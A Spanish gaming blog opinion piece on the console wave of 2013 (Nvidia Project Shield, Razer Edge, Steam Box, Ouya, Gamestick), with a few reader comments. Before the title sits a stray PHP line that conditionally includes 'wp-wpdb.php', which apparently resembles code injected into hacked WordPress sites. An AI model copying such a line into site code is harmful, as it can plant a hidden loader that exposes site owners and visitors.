if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); La burbuja "inconsolaria": Las consolas que llegan en 2013 – La Fortaleza de LeChuck

La burbuja "inconsolaria": Las consolas que llegan en 2013

En plena crisis mundial hay una nueva moda que nadie esperaba. Ante las moderadas ventas de las últimas consolas sacadas a la venta, PS Vita y Wii U, portátil y sobremesa, yo apuesto a que el mundo, en general, tiene bastante con las consolas que hay en este momento. Teniendo en cuenta esto, y que si PS Vita y Wii U sobreviven, y sobrevivirán, es por el apoyo que tienen detrás con dos grandes marcas del videojuego detrás con grandes juegos desarrollados por ellos mismos, jamás me podía imaginar que iban a salir nuevas videoconsolas de debajo de las piedras. ¿Nvidia Project Shield? ¿Razer Edge?¿Steam Box? ¿Ouya? ¿Gamestick?

Todo lo que nombro son consolas que han sido presentadas o hemos sabido de su existencia durante este último año, y que parece que quieran dar un nuevo rumbo a la industria, de alguna forma. Unos apuestan por la potencia bruta y el streaming, otros por llevar la tienda online de videojuegos más amada y famosa a un miniPC en tu salón, y otros que apuestan por un gran precio y la base de juegos Android para tener un mínimo de posibilidades.
Todas tienen algo en común, salen en un momento en el que parece que la gente está a gusto con la consola que tiene en casa. Aunque muchos jugones siempre tengan sed de ver nuevas cosas en forma de tecnologías, o capacidades técnicas, la verdad es que parece que el mundo no está preparado para dar un paso más allá, no tiene tanto para gastar en nuevos proyectos.
Veamos por ejemplo, los últimos datos de ventas que se publican de Reino Unido, dicen que la compra de videojuegos se ha reducido en 2012 un 14% respecto a 2011, y la compra de videoconsolas más de un 30%. Está claro, es una generación larga, y la gente poco a poco ya tiene su videoconsola la cual espera dure años, tantos años al menos como una PS2.

Ante esta generación de larga duración, algunos podrán gastar el dinero en nuevas consolas como las que comentaba al principio. Unos apuestan por su nombre, y otros por proyectos Kickstarter con precios atractivos para tener una consola Android con mando en el salón. Ahí las posibilidades son varias, pero está claro que ninguna de estas nuevas propuestas va a ser de ventas masivas. 

Nvidia Project Shield
La apuesta de Nvidia por su propia portátil denominada por el momento «Project Shield» parece más una forma de dar el cante que otra cosa. Un mando monstruoso (Casi como el primer mando que tuvo Xbox) junto a una pantalla, y juegos «móviles» para su nuevo procesador Tegra 4. Toda reproducción de juegos «de sobremesa» han sido jugados por streaming, a partir del nuevo servicio que quieren imponerle con servidores de procesadores Nvidia haciendo el trabajo duro. Si el servicio Onlive no ha llegado a triunfar, veremos el tamaño de la galleta de su Project Shield. En todo caso, parece solo una forma de promocionar y apoyar sus procesadores móviles Tegra 4, que un proyecto de consola serio.
Razer Edge
El Razer Edge, de la prestigiosa marca de periféricos para PC, es todavía más monstruoso. Una TabletPC, con prestaciones para darle a juegos de PC (Monstruosas) sobre una tablet Windows 8 (a la que se le puede adaptar un periférico que son dos sticks con botones, teclado, mandos…). Ningún futuro, y poca salida le veo yo a un cacharro que costará 1000$ en su versión más «sencilla». Un PCero seguirá jugando en su PC, con su ratón, y esto no le llama nada.
«Steambox» Project Piston, etc.
Lo que si le llama a algún PCero, quizás, es tener una máquina para jugar basada en Steam. Aquí el riesgo de los chicos de Valve es apostar por Linux como software para llevar su plataforma a los salones. Es toda una declaración de intenciones para que los desarrolladores se pongan las pilas y hagan juegos para Linux, y apartarse de las manazas de Microsoft con Windows 8, que con su nueva tienda de aplicaciones y juegos, pone en peligro el negocio de Valve (Aunque han comentado que se podrá instalar Windows 8 si se desea, libertad ante todo). Al final, se trata de «simples» miniPC con un mando, que junto a Big Picture, la interfaz de Steam para TV, hará que la comodidad de jugar en la televisión sea una opción más para los consoleros que admiren las ofertas de Steam. No siendo una sola máquina, e incluso manteniendo la libertad de poder ampliar las prestaciones de tu «Steambox», parece que aunque no vaya a ser un producto masivo, si que será sello de buen gamer tener una cajita de Steam en el salón
Ouya y Gamestick
Después tenemos Ouya, Gamestick, y diez mil sucedáneos que tienen una idea parecida. Llevar una consola baratita para jugar juegos «sencillos» a tu sala de estar. Como sabemos, Ouya es la consola de 99$ que nació a partir de las famosas Kickstarters, y quizás la más prometedora, por no solo basarse en Android y «rascar» los juegos de allí, si no con un discurso más «indie» de tener allí grandes juegos y apoyo de la comunidad para hacer que los mejores juegos sean jugables en tu televisión. Demostrará que se puede hacer con el procesador Nvidia Tegra 3 que monta. Gamestick, que también nace (y de hecho están en ello) hace bien poco a partir de crowfunding, ya no se le puede llamar consola, sino, uno de estos «Pendrive» con Android preinstalado y con una capacidad técnica medio decente. Con un mando más portable basado en sticks analógicos parecidos al de Nintendo 3DS y PSP, la idea es poder llevar el cacharrín y el mando facilmente y conectarlo a cualquier TV para jugar. La idea es divertida, pero no hay teles donde enchufar consolas en el metro, así que descarto un éxito abrumador, más allá de que todos los que han dado sus 69$ en la Kickstarter por ella. Jugarás a juegos Android tal cual (Como ya puedes hacer en muchos AndroidUSB existentes), ya que tiene acceso a la propia tienda de aplicaciones de ésta, para bien o para mal.
No se si el mundo está preparado para tantas ideas para el salón, pero está claro que es donde el ser hogareño pasa más tiempo después del dormitorio, y toda la tecnología últimamente se encara de forma enrarecida a meternos todos delante de la tele ¡Con lo bien que se está sentado delante del PC!. En todo caso, en los próximos meses veremos el éxito de todas estas extravagancias consoleras y si la gente prefiere seguir apostando por lo clásico con el apoyo «First Party» o prefiere lanzarse a «reproductores de juegos» con un futuro más bien oscuro ¿Explotará esta burbuja «inconsolaria?
Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

7 comentarios

    1. No he pillado lo de Gabecube hasta que he buscado en Google, he encontrado un .com y he clickado para ver un video de cuatro gordos en GTA IV liándola xDDDDDDDD. Creo que va a ofrecer lo mismo que cualquier PC, si está bien integrado con la tele y tiene un tamaño moderado…

  1. A parte de las supuestas nuevas playstation y xbox, de todas estas nuevas "consolas" que van saliendo la que más me interesa con diferencia es la steam box. Llevo tiempo pensando en montarme un PC para poner en el salón y jugar. Si, sólo jugarrrr! Y esto es perfecto para mi.

    El Razer Edge y la de Nvidia me parecen 2 abortos monstruosos, como bien dice Guybrush, que no creo

    1. Está claro, que por catálogo ya gana de goleada Steambox xD.

      Lo de Ouya que se ha visto juraría que son juegos Android sin más, los juegos que salgan para ella al menos estarán mejor integrados (no saldrá un puntero en pantalla xd)

Dejar un comentario